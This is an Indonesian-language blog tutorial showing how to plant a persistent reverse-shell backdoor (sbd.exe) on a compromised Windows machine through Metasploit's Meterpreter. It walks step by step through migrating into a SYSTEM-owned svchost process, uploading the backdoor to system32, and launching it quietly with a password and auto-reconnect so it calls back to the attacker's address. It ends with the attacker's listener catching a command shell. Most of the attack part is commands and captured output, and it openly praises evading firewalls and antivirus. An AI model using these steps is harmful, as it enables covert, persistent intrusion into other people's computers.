Back door secara harfiah berarti pintu belakang. Jika anda kesulitan masuk lewat pintu depan, maka sangatlah penting untuk membuat pintu belakang ketika anda mendapatkan system. Anda tidak perlu babak belur lagi dalam menghadapi firewall, atau antivirus. Anda hanya mengakses pintu belakang, dan anda sudah dapat mengakses system seketika itu juga.
Kali ini saya akan membahas mengenai Secure Back Door. Secure back door sama seperti trojan, korban tidak mengetahui kapan attacker masuk ke dalam system nya. Untuk itu, sudah banyak antivirus yang mengincar secure back door untuk dihabisi secara tidak manusiawi. [???]
Langsung saja kita ke tutorial.
Preparation:
[*] sbd.exe dapat di temukan di dalam backtrack 5 atau download di sini.
[*] metaploit dapat ditemukan di backtrack 5, atau download di sini
Briefing:
[*] Kita akan menggunakan metaspoit interpreter untuk mengupload secure back door
[*] Setelah diupload, kita jalankan secure back door untuk melakukan koneksi terhadap attacker
[*] Kita akan melakukan listening sesuai dengan settingan secure back door
[*] Beberapa saat setelah secure back door melakukan koneksi terhadap attacker, kita akan mendapatkan system korban
Note:
Saya tidak akan menjelaskan bagaimana saya mendapatkan sesi meterpreter, di sini saya berfokus untuk menjelaskan penggunaan secure backdoor. Mendapatkan sesi meterpreter adalah tugas anda.
1. Gaining Access
Setelah mendapatkan sesi meterpreter, saya akan melakukan aksi migrasi ke process yang berasal dari directory C:/WINDOWS/system32. Dalam kasus ini saya melakukan migrasi ke proses 848 milik svchost.exe.
Command :
msf exploit(handler) > exploit
[*] Started reverse handler on 172.16.230.1:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 172.16.230.128
[*] Meterpreter session 1 opened (172.16.230.1:4444 -> 172.16.230.128:1034) at 2012-01-08 17:23:35 +0700
meterpreter >
Sebelum melakukan process migrate, kita akan menggunakan perintah ps untuk mengecek process list korban
Command :
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
1028 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1056 wmiprvse.exe x86 0 C:\WINDOWS\system32\wbem\wmiprvse.exe
1088 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1140 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1392 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
1448 explorer.exe x86 0 VICTIM\User C:\WINDOWS\Explorer.EXE
1532 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1580 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
1728 VMwareTray.exe x86 0 VICTIM\User C:\Program Files\VMware\VMware Tools\VMwareTray.exe
1736 vmtoolsd.exe x86 0 VICTIM\User C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1892 AntDS.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\BigAntSoft\AntServer\AntDS.exe
1908 AntServer.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\BigAntSoft\AntServer\AntServer.exe
1920 AvServer.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\BigAntSoft\AntServer\AvServer.exe
2060 wscntfy.exe x86 0 VICTIM\User C:\WINDOWS\system32\wscntfy.exe
228 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2580 TPAutoConnect.exe x86 0 VICTIM\User C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
2636 MP3Studio.exe x86 0 VICTIM\User C:\mp3-millennium\MP3Studio.exe
380 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
4 System x86 0
592 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
616 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
668 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
680 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
832 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
848 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
928 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
Bingo. Kita mendapatkan process svchost dengan process ID 848. Lakukan perintah migrate.
Command :
meterpreter > migrate 848
[*] Migrating to 848...
[*] Migration completed successfully.
Ok. Kita berhasil berpindah ke process svchost. Migrate tidak hanya berfungsi untuk merubah process work directory, melainkan juga untuk merubah User ID. Untuk mengecek process work directoty, gunakan perintah pwd.
Command :
meterpreter > pwd
C:\WINDOWS\system32
Untuk mengecek User ID, gunakan perintah getuid.
Command :
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Ok. Kita sudah berada di puncak rantai process.
2. Upload Secure Back Door
Untuk mengupload Secure Back Door, kita bisa gunakan perintah upload dalam metasploit interpreter. Lalu dimana Secure Back Door kita? Dalam backtrack 5, Secure Back Door, bersemayam di dalam directory /pentest/windows-binaries/tools dan Secure Back Door memiliki nama sbd.exe. Kita akan mengupload ini ke dalam system korban. Di sini, saya akan mengupload Secure Back Door ke directoy pusat, yaitu C:/WINDOWS/system32.
Command :
meterpreter > upload /pentest/windows-binaries/tools/sbd.exe C:/WINDOWS/system32
[*] uploading : /pentest/windows-binaries/tools/sbd.exe -> C:/WINDOWS/system32
[*] uploaded : /pentest/windows-binaries/tools/sbd.exe -> C:/WINDOWS/system32\sbd.exe
Berhasil. Kita sudah menempatkan Secure Back Door di dalam system korban. Langkah selanjutnya adalah mengeksekusi Secure Back Door.
3. Mengeksekusi Secure Back Door
Untuk mengeksekusi Secure Back Door, kita dapat menggunakan dua cara:
[*] Menggunakan metasploit interpreter dengan perintah execute
[*] Menggunakan Command Promtp untuk mengeksekusi Secure Back Door
Kali ini saya menggunakan Command Prompt untuk mengeksekusi Secure Back Door. Hal yang perlu diperhatikan adalah process work directory dari command prompt. Mengingat saya sudah mengupload Secure Back Door ke direktori C:/WINDOWS/system32, maka command prompt kita harus berada di C:/WINDOWS/system32. Bagaimana cara mengetahuinya? Kita bisa melihat dari kepala Command Prompt.
C:/>
Diatas menunjukan bahwa command prompt berada dalam direktory C:
C:\WINDOWS\system32>
Sementara di atas menunjukan bahwa Command Prompt berada dalam direktori C:\WINDOWS\system32
Untuk menggunakan command prompt, kita akan menggunakan metasploit interpreter dengan perintah shell.
Command :
meterpreter > shell
Process 3524 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Ok. Sekarang saya telah mengendalikan command prompt. Langkah selanjutnya adalah mengeksekusi Secure Back Door. Masih ingatkah bahwa secure back door memiliki nama sbd.exe? Bagus... Mengeksekusi sbd.exe sangatlah mudah. Berikut perintahnya:
Command :
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>sbd.exe -q -r 5 -k secret -e cmd -p 1809 172.16.230.1
Penggunaan :
-l Daftar koneksi yang datang (List)
-p Memilih port yang digunakan untuk melakukan koneksi, atau
listener (port)
-a memilih sebuah alamat untuk dituju, atau didengar
-e memilih program yang akan dieksekusi setelah terjadi koneksi
(contoh. -e cmd.exe or -e bash)
-r menghubungi kembali tujuan.
(contoh. -r 5 berarti menghubungi kembali setiap 5 detik)
-c mengatur enkripsi, anda bisa menggunakan enkripsi
AES-CBC-128 + HMAC-SHA1 cukup dengan
mengatur nilai c menjadi on. Jika tidak ingin menggunakan
enkripsi, maka atur nilai c menjadi off.
-k ini adalah parameter yang harus disisipkan. Karena butuh kata
kunci untuk melengkapi sebuah koneksi.
-q mode qiuet (diam)
-v menonaktifkan mode quiet (verbose)
-m menggunakan perintah monitoring koneksi
-H memberi tanda highlight pada data atau koneksi yang masuk.
-V mengecek versi sbd
-w mengatur batas waktu timeout.
-D on|off menjalankan program dibalik layar (background process)
Dalam perintah di atas, saya akan menjelaskan pengaturan Secure Back Door saya
1. -q : Saya menggunakan mode diam, seperti moto backtrack, the quieter you are, the more you are able to hear.
2. -r : saya melakukan respawn atau reconnect setiap 5 detik
3. -k : kata kunci saya adalah secret
4. -e : setelah terjadi koneksi, saya akan mengeksekusi command prompt (cmd)
5. -p : saya akan mencoba untuk menghubungi port 1809 (sebenarnya ini tanggal jadian saya)
6. IP di belakang adalah IP address saya. Saya akan membuat korban mengakses IP address saya.
Ok, setelah semua pengaturan telah selesai, sekarang kita akan mendengarkan ada apa di port 1809.
4. The Quieter You Are, The More You Are Able To Hear!
Untuk mendengarkan apa yang terjadi di port 1809, kita akan menggunakan perintah sbd di dalam terminal. Dalam kasus saya, saya telah mengatur Secure Back Door agar menghubungi saya di port 1809. Maka perintahnya adalah:
Command :
root@revolution:~# sbd -l -k secret -p 1809
Seperti di dalam pengaturan Secure Back Door saya. Saya menggunakan kata kunci secret, dan melakukan listening (-l) pada port 1809 (-p).
Setelah menunggu sekitar 5 detik....
Command :
root@revolution:~# sbd -l -k secret -p 1809
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Excellent as usual.
created by : red-dragon
0 comment:
Post a Comment